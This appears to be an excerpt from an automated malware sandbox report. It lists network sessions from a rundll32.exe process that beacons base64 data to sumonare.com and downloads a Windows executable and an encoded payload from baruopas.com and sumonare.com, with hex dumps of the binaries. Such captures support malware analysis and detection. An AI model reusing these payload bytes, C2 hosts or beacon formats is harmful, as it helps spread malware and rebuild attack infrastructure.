                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:24:01.949266911 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:24:01 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                96192.168.2.749819194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:24:02.099358082 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:24:02.931400061 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:24:02 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                97192.168.2.749820194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:24:03.095851898 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:24:03.893477917 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:24:03 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                98192.168.2.749821194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:24:04.054858923 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:24:04.856798887 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:24:04 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.749700194.67.193.134437356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                2024-09-28 01:22:06 UTC120OUTGET /projects/useraccount.aspx HTTP/1.1
                User-Agent: Microsoft-WNS/11.0
                Host: baruopas.com
                Cache-Control: no-cache
                2024-09-28 01:22:06 UTC252INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:06 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                Last-Modified: Thu, 22 Aug 2024 19:55:31 GMT
                ETag: "e3a00-6204b0a8e1173"
                Accept-Ranges: bytes
                Content-Length: 932352
                Connection: close
                2024-09-28 01:22:06 UTC7940INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 19 79 7d 42 78 17 2e 42 78 17 2e 42 78 17 2e 91 0a 14 2f 48 78 17 2e 91 0a 12 2f ca 78 17 2e 91 0a 13 2f 56 78 17 2e 44 f9 12 2f 5c 78 17 2e 44 f9 13 2f 52 78 17 2e 44 f9 14 2f 56 78 17 2e 91 0a 16 2f 49 78 17 2e 42 78 16 2e cc 78 17 2e 28 f9 12 2f 40 78 17 2e 28 f9 17 2f 43 78 17 2e 28 f9 15 2f 43 78 17 2e 52 69 63 68 42 78 17 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y}Bx.Bx.Bx./Hx./x./Vx.D/\x.D/Rx.D/Vx./Ix.Bx.x.(/@x.(/Cx.(/Cx.RichBx.
                2024-09-28 01:22:07 UTC16384INData Raw: 1b 00 00 00 8b 45 08 66 89 50 04 b9 06 00 00 00 8b 55 08 66 89 4a 06 b8 0a 00 00 00 8b 4d 08 66 89 41 08 ba 0c 00 00 00 8b 45 08 66 89 50 0a b9 1a 00 00 00 8b 55 08 66 89 4a 0c b8 1a 00 00 00 8b 4d 08 66 89 41 0e ba 06 00 00 00 8b 45 08 66 89 50 10 b9 1b 00 00 00 8b 55 08 66 89 4a 12 b8 16 00 00 00 8b 4d 08 66 89 41 14 ba 1b 00 00 00 8b 45 08 66 89 50 16 b9 0c 00 00 00 8b 55 08 66 89 4a 18 b8 1f 00 00 00 8b 4d 08 66 89 41 1a 33 d2 8b 45 08 66 89 50 1c b9 1a 00 00 00 8b 55 08 66 89 4a 1e 33 c0 8b 4d 08 66 89 41 20 ba 06 00 00 00 8b 45 08 66 89 50 22 b9 07 00 00 00 8b 55 08 66 89 4a 24 33 c0 8b 4d 08 66 89 41 26 8b 45 08 8b e5 5d c2 04 00 cc cc cc cc cc 55 8b ec 6a ff 68 d3 e2 0a 10 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 83 ec 14 89 4d f0 c7 45 ec 0b 00
                Data Ascii: EfPUfJMfAEfPUfJMfAEfPUfJMfAEfPUfJMfA3EfPUfJ3MfA EfP"UfJ$3MfA&E]UjhdPd%ME
                2024-09-28 01:22:07 UTC16384INData Raw: ff 00 00 00 00 0f be 4d fa f7 d1 69 d1 90 d5 00 00 03 95 60 fe ff ff 89 55 d4 0f bf 45 e0 99 89 45 c0 89 55 c4 e9 82 00 00 00 83 3d 70 31 0d 10 00 75 0c c7 85 5c fe ff ff 01 00 00 00 eb 0a c7 85 5c fe ff ff 00 00 00 00 0f be 45 ff 03 85 5c fe ff ff a2 26 30 0d 10 8b 45 dc 99 8b 4d cc 8b 75 d0 2b c8 1b f2 89 4d cc 89 75 d0 0f be 55 fa b8 04 00 00 00 69 c8 1b 92 00 00 89 91 f8 ce 1b 10 a1 68 31 0d 10 8b 15 6c 31 0d 10 b1 01 e8 29 bb 09 00 66 a3 78 31 0d 10 8b 15 78 3c 0d 10 33 c0 89 15 48 31 0d 10 a3 4c 31 0d 10 8b 4d 94 8b 11 81 e2 00 00 00 80 0f 84 a9 00 00 00 8b 45 a8 50 8b 4d a4 51 8b 15 8c 31 0d 10 52 a1 88 31 0d 10 50 e8 d5 b9 09 00 a3 88 31 0d 10 89 15 8c 31 0d 10 33 c9 c7 45 c0 04 00 00 00 89 4d c4 0f b6 15 27 30 0d 10 8b 45 bc 2b c2 f7 d0 33 c9 89
                Data Ascii: Mi`UEEU=p1u\\E\&0EMu+MuUih1l1)fx1x<3H1L1MEPMQ1R1P113EM'0E+3
                2024-09-28 01:22:07 UTC16384INData Raw: 52 51 e8 a5 7a 09 00 03 05 50 31 0d 10 13 15 54 31 0d 10 89 85 80 fc ff ff 89 95 84 fc ff ff 8b 8d 80 fc ff ff 0b 8d 84 fc ff ff 75 09 c6 85 7f ff ff ff 01 eb 07 c6 85 7f ff ff ff 00 8a 95 7f ff ff ff 88 15 63 30 0d 10 a1 74 31 0d 10 2b 05 88 31 0d 10 8b 0d 74 31 0d 10 0b c8 89 0d 74 31 0d 10 0f bf 45 e4 c1 e0 04 99 a3 68 31 0d 10 89 15 6c 31 0d 10 8b 55 a4 8b 45 a8 89 85 1c fc ff ff 81 ea 80 15 16 2d 66 89 15 2c 31 0d 10 0f b6 0d 27 30 0d 10 69 d1 e5 14 00 00 66 89 15 5c 31 0d 10 8b 85 88 fd ff ff 83 c0 02 0b 85 7c fe ff ff 39 85 7c fe ff ff 74 65 8b 4d 94 8b 55 98 89 95 18 fc ff ff 03 0d 38 31 0d 10 88 4d eb 0f b7 05 5c 31 0d 10 99 25 69 40 9c 7d 88 45 ee a1 88 31 0d 10 2d df 88 64 fa 66 89 45 dc 8a 0d 5c 31 0d 10 88 0d 4f 30 0d 10 ba 46 00 00 00 66 89
                Data Ascii: RQzP1T1uc0t1+1t1t1Eh1l1UE-f,1'0if\1|9|teMU81M\1%i@}E1-dfE\1O0Ff
                2024-09-28 01:22:07 UTC16384INData Raw: 85 48 fe ff ff 00 00 00 00 8b 85 4c fe ff ff 3b 85 48 fe ff ff 0f 85 d2 02 00 00 c7 45 fc 06 00 00 00 b9 02 00 00 00 66 89 0d 78 31 0d 10 8b 15 a8 31 0d 10 a1 ac 31 0d 10 89 85 74 fb ff ff 81 ea 03 56 8c 46 66 89 55 d8 0f b7 05 78 31 0d 10 99 35 1a 8e 8e 8b 81 f2 01 e3 06 00 03 05 38 31 0d 10 13 15 3c 31 0d 10 a3 38 31 0d 10 89 15 3c 31 0d 10 0f b6 4d e9 81 c1 cc 76 00 00 89 4d c0 0f b7 55 dc 0f be 45 ee 2b d0 0f b7 4d dc 03 ca 66 89 4d dc 8b 15 90 31 0d 10 66 89 15 5c 31 0d 10 0f b7 05 78 31 0d 10 89 85 54 ff ff ff 83 bd 54 ff ff ff 00 74 1f 83 bd 54 ff ff ff 01 0f 84 ae 00 00 00 83 bd 54 ff ff ff 02 0f 84 4e 01 00 00 e9 b1 01 00 00 0f b6 4d ea 83 c1 3c 66 89 0d 78 31 0d 10 8b 55 94 33 c0 8b 0d 80 31 0d 10 8b 35 84 31 0d 10 56 51 50 52 e8 ae 39 09 00 8b
                Data Ascii: HL;HEfx111tVFfUx1581<181<1MvMUE+MfM1f\1x1TTtTTNM<fx1U3151VQPR9
                2024-09-28 01:22:07 UTC16384INData Raw: e4 85 c9 0f 85 12 01 00 00 8b 95 7c ff ff ff 33 95 7c ff ff ff 8b 85 7c ff ff ff 2b c2 89 85 7c ff ff ff 8b 0d 8c 31 0d 10 51 8b 15 88 31 0d 10 52 a1 3c 31 0d 10 50 8b 0d 38 31 0d 10 51 e8 69 fa 08 00 a3 38 31 0d 10 89 15 3c 31 0d 10 8b 15 74 31 0d 10 2b 55 a4 89 15 74 31 0d 10 0f be 45 ed 85 c0 75 0c c7 85 e4 fc ff ff 01 00 00 00 eb 0a c7 85 e4 fc ff ff 00 00 00 00 8b 4d c0 8b 55 c4 a1 64 31 0d 10 50 a1 60 31 0d 10 50 52 51 e8 18 fa 08 00 8b 4d 80 f7 d1 0f bf 75 e4 2b f1 33 c9 52 50 51 56 e8 02 fa 08 00 8b c8 8b f2 0f b7 55 e0 f7 d2 0f bf 45 e4 2b c2 0b 85 e4 fc ff ff 99 2b c1 1b d6 a3 88 31 0d 10 89 15 8c 31 0d 10 8b 45 b0 8b 0d a8 31 0d 10 8b 35 ac 31 0d 10 03 4d ac 13 f0 f7 d1 f7 d6 0f b6 55 ef 0f bf 45 e4 2b c2 99 56 51 52 50 e8 b0 f9 08 00 a3 40 31
                Data Ascii: |3||+|1Q1R<1P81Qi81<1t1+Ut1EuMUd1P`1PRQMu+3RPQVUE++11E151MUE+VQRP@1
                2024-09-28 01:22:07 UTC16384INData Raw: c1 a9 6c 56 49 66 89 0d b0 31 0d 10 e9 9e 00 00 00 81 7d 98 e2 01 7e e4 75 12 83 7d 9c 00 75 0c c7 85 04 fe ff ff 01 00 00 00 eb 0a c7 85 04 fe ff ff 00 00 00 00 0f be 55 ed 83 fa 16 7c 0c c7 85 00 fe ff ff 01 00 00 00 eb 0a c7 85 00 fe ff ff 00 00 00 00 8b 85 04 fe ff ff 3b 85 00 fe ff ff 7d 4c 8b 0d a8 31 0d 10 8b 15 ac 31 0d 10 23 0d 50 31 0d 10 23 15 54 31 0d 10 89 0d 50 31 0d 10 89 15 54 31 0d 10 a1 78 3c 0d 10 33 c9 a3 38 31 0d 10 89 0d 3c 31 0d 10 ba 01 00 00 00 66 89 55 d4 a1 78 3c 0d 10 33 c9 89 45 c0 89 4d c4 eb 61 0f b7 55 e0 b8 04 00 00 00 69 c8 7c 05 00 00 89 91 f8 ce 1b 10 0f b6 15 27 30 0d 10 b8 04 00 00 00 69 c8 80 4a 00 00 89 91 f0 a8 19 10 69 95 7c ff ff ff 91 00 00 00 89 15 44 31 0d 10 8b 45 b4 2d d0 62 d7 40 89 45 a8 33 c9 c7 05 50 31
                Data Ascii: lVIf1}~u}uU|;}L11#P1#T1P1T1x<381<1fUx<3EMaUi|'0iJi|D1E-b@E3P1
                2024-09-28 01:22:07 UTC16384INData Raw: b9 08 00 00 00 6b c9 0a 89 81 18 21 12 10 89 91 1c 21 12 10 8b 85 7c ff ff ff 99 8b c8 81 e9 69 4f ad fe a1 34 31 0d 10 99 2b c1 a3 34 31 0d 10 66 8b 15 78 3c 0d 10 66 89 15 28 31 0d 10 0f be 45 ec 69 c0 4a 88 41 47 99 89 45 ac 89 55 b0 0f be 45 ee 99 89 45 ac 89 55 b0 0f bf 4d e4 89 8d 7c ff ff ff 0f b7 55 e0 c1 fa 04 66 89 55 d4 83 3d 74 31 0d 10 00 75 0c c7 85 f0 fc ff ff 01 00 00 00 eb 0a c7 85 f0 fc ff ff 00 00 00 00 b8 bc 00 00 00 2b 05 1c 31 0d 10 0f b7 4d e0 0f af c8 0f bf 15 30 31 0d 10 0f bf 05 28 31 0d 10 0f af c2 8b 15 1c 31 0d 10 f7 d2 2b 95 f0 fc ff ff 0f af d0 03 d1 75 0c c7 85 ec fc ff ff 01 00 00 00 eb 0a c7 85 ec fc ff ff 00 00 00 00 8b 85 ec fc ff ff 89 45 bc 8b 4d bc 81 e9 7a 2f 9b 5b 89 4d 8c ba 02 00 00 00 6b c2 2c 0f bf 88 80 3c 0d
                Data Ascii: k!!|iO41+41fx<f(1EiJAGEUEEUM|UfU=t1u+1M01(11+uEMz/[Mk,<
                2024-09-28 01:22:07 UTC16384INData Raw: 0d 10 52 ff 15 58 f0 0a 10 33 c9 89 45 98 89 4d 9c 8b 95 24 ff ff ff 81 c2 6e 05 00 00 89 95 54 f3 ff ff a1 48 31 0d 10 0b 05 4c 31 0d 10 74 6c c7 05 74 31 0d 10 e3 00 00 00 0f be 45 ec 99 8b c8 8b f2 0f bf 45 d4 99 23 05 50 31 0d 10 23 15 54 31 0d 10 03 c1 13 d6 f7 d0 f7 d2 89 45 c8 89 55 cc 8b 45 b0 99 8b c8 03 0d 38 31 0d 10 8b 45 b0 99 2b c1 89 45 b0 8b 15 78 3c 0d 10 33 c0 89 15 80 31 0d 10 a3 84 31 0d 10 0f be 4d ee 69 d1 3a c4 47 19 88 55 ee e9 0a 01 00 00 0f b7 05 5c 31 0d 10 85 c0 0f 84 fb 00 00 00 0f bf 4d d8 81 e9 c2 6a 32 6c 66 89 0d 78 31 0d 10 0f bf 15 28 31 0d 10 0f af 15 90 31 0d 10 0f bf 05 28 31 0d 10 2b c2 66 a3 28 31 0d 10 0f b7 05 5c 31 0d 10 99 68 f6 44 0a 00 68 8a 4a 6a 33 52 50 e8 ba 39 08 00 89 45 84 89 55 88 8b 0d 60 31 0d 10 f7
                Data Ascii: RX3EM$nTH1L1tlt1EE#P1#T1EUE81E+Ex<311Mi:GU\1Mj2lfx1(11(1+f(1\1hDhJj3RP9EU`1
                2024-09-28 01:22:07 UTC16384INData Raw: 0d 10 a1 84 31 0d 10 6a 00 6a 75 50 52 e8 9a fa 07 00 a3 20 31 0d 10 89 15 24 31 0d 10 8a 0d 74 31 0d 10 88 4d ed c6 45 ec 90 a1 90 31 0d 10 83 e8 05 99 89 45 c0 89 55 c4 8b 0d 98 31 0d 10 8b 15 9c 31 0d 10 89 95 d8 f2 ff ff 0f bf 05 2c 31 0d 10 99 8b f0 2b f1 0f bf 05 2c 31 0d 10 99 03 c6 66 a3 2c 31 0d 10 b8 7a 2b 02 10 c3 c7 45 fc ff ff ff ff eb 07 c7 45 fc ff ff ff ff 8b 85 00 ff ff ff 05 7e 04 00 00 89 85 d4 f2 ff ff c7 05 74 31 0d 10 01 00 00 00 0f bf 0d 2c 31 0d 10 0f af 0d 44 31 0d 10 66 89 0d 2c 31 0d 10 0f bf 15 28 31 0d 10 81 ea 09 82 61 4b 89 55 94 b8 01 00 00 00 69 c8 02 0d 00 00 0f b6 91 e0 21 12 10 89 55 b0 0f bf 05 30 31 0d 10 2d 01 89 0f 4b 33 c9 89 45 98 89 4d 9c 8b 15 74 31 0d 10 89 95 a4 fc ff ff 83 bd a4 fc ff ff 00 74 12 83 bd a4 fc
                Data Ascii: 1jjuPR 1$1t1ME1EU11,1+,1f,1z+EE~t1,1D1f,1(1aKUi!U01-K3EMt1t


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.749702194.67.193.124437356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                2024-09-28 01:22:09 UTC114OUTGET /projects/index.aspx HTTP/1.1
                User-Agent: Microsoft-WNS/11.0
                Host: sumonare.com
                Cache-Control: no-cache
                2024-09-28 01:22:09 UTC253INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:09 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                Last-Modified: Thu, 22 Aug 2024 19:01:47 GMT
                ETag: "f8302-6204a4a61cd40"
                Accept-Ranges: bytes
                Content-Length: 1016578
                Connection: close
                2024-09-28 01:22:09 UTC7939INData Raw: 4e 47 6a 65 4d 6c 4a 35 55 57 31 65 5a 6d 74 6c 79 73 64 72 54 73 78 5a 61 30 64 35 4d 6b 34 79 45 58 6c 52 62 56 70 6d 61 32 55 31 4f 47 74 4f 64 46 6c 72 52 33 6b 79 54 6a 4a 52 65 56 46 74 0d 0a 57 6d 5a 72 5a 54 55 34 61 30 35 30 57 57 74 48 61 54 4e 4f 4d 6c 39 6d 36 32 4e 61 30 6d 4b 6f 46 49 42 71 41 72 6c 34 50 79 38 51 51 57 35 43 49 78 59 32 48 7a 73 4c 53 77 5a 55 56 67 55 68 0d 0a 41 48 6b 4a 49 6c 6c 41 4f 31 78 78 45 44 39 4e 48 69 6b 34 52 56 68 58 44 79 74 61 56 47 5a 4e 58 54 4a 4f 4d 6c 46 35 55 57 33 6a 33 6f 31 4e 79 4f 48 6a 4e 59 6d 41 34 7a 79 45 36 38 5a 4a 0d 0a 66 39 4c 61 46 36 79 2f 34 78 34 62 6b 2b 59 30 4b 49 44 6a 50 49 4a 71 77 6b 69 38 6f 4e 6b 57 6f 54 37 67 48 39 37 68 34 7a 56 61 38 75 63 39 6b 75 76 47 53 61 6f 68 33
                Data Ascii: NGjeMlJ5UW1eZmtlysdrTsxZa0d5Mk4yEXlRbVpma2U1OGtOdFlrR3kyTjJReVFtWmZrZTU4a050WWtHaTNOMl9m62Na0mKoFIBqArl4Py8QQW5CIxY2HzsLSwZUVgUhAHkJIllAO1xxED9NHik4RVhXDytaVGZNXTJOMlF5UW3j3o1NyOHjNYmA4zyE68ZJf9LaF6y/4x4bk+Y0KIDjPIJqwki8oNkWoT7gH97h4zVa8uc9kuvGSaoh3
                2024-09-28 01:22:09 UTC16384INData Raw: 69 54 2f 30 59 62 38 34 34 4f 73 56 6e 72 62 34 54 61 56 74 6d 61 32 57 2b 66 5a 65 4a 4e 46 46 71 52 33 6b 79 78 58 2b 74 76 6c 44 52 0d 0a 37 6d 39 37 37 6d 41 30 34 68 75 63 30 69 35 50 38 48 65 71 75 52 79 46 30 71 78 57 37 79 61 4a 76 6d 32 48 78 79 47 68 34 41 4b 52 75 77 76 53 32 6a 53 31 35 42 65 36 34 44 44 56 73 32 6e 48 0d 0a 4d 59 48 67 43 71 57 35 58 37 73 45 6a 64 6f 6f 6f 71 46 72 6f 61 4d 78 65 38 55 35 6f 61 78 47 55 61 56 48 49 74 6f 73 71 65 59 66 6b 75 49 6e 4d 62 73 57 75 6e 51 73 59 6f 41 38 77 6b 34 79 0d 0a 55 58 6d 36 5a 4e 45 72 6e 32 5a 34 34 4f 49 44 68 4e 49 2b 76 2f 4a 33 76 72 73 54 63 64 6f 6f 70 75 32 4f 4f 50 63 77 61 34 49 68 30 6f 66 45 6c 53 62 48 66 36 33 79 46 4a 47 63 5a 6d 74 57 0d 0a 2f 4c 4d 2b 73 76 65 62 59 38
                Data Ascii: iT/0Yb844OsVnrb4TaVtma2W+fZeJNFFqR3kyxX+tvlDR7m977mA04huc0i5P8HequRyF0qxW7yaJvm2HxyGh4AKRuwvS2jS15Be64DDVs2nHMYHgCqW5X7sEjdoooqFroaMxe8U5oaxGUaVHItosqeYfkuInMbsWunQsYoA8wk4yUXm6ZNErn2Z44OIDhNI+v/J3vrsTcdoopu2OOPcwa4Ih0ofElSbHf63yFJGcZmtW/LM+svebY8
                2024-09-28 01:22:09 UTC16384INData Raw: 4c 6f 6e 44 73 61 30 35 30 57 65 41 43 57 62 73 4c 31 74 6f 30 54 65 51 58 6a 75 41 77 0d 0a 33 62 45 2b 69 76 38 63 6a 38 34 38 2b 73 4e 2f 6c 66 41 63 73 64 45 7a 69 7a 65 2b 64 62 65 6d 77 47 56 71 52 35 41 6c 73 63 32 75 38 68 52 6c 30 53 74 33 37 6d 41 59 34 6b 62 39 43 57 2f 4d 0d 0a 50 44 72 46 31 77 79 36 6e 61 47 57 71 71 65 70 2b 66 53 6e 67 69 48 53 68 78 71 36 2f 6f 4c 2b 6e 62 57 64 6f 5a 61 71 70 36 6c 67 73 34 63 66 6e 31 44 67 41 6e 47 78 6a 69 4c 59 50 46 6e 6d 0d 0a 46 32 35 51 4b 44 6c 4d 58 4d 55 68 55 65 49 53 68 62 6b 44 7a 72 6b 43 58 47 35 61 37 53 36 5a 4f 6f 35 6a 48 2f 38 55 6c 38 53 34 4f 71 5a 72 4e 48 70 52 58 6f 6a 6c 69 57 52 42 4e 67 46 65 0d 0a 2f 78 79 58 46 35 47 77 67 6a 52 52 2b 70 56 6c 73 64 37 67 67 47 6a 37 70 34
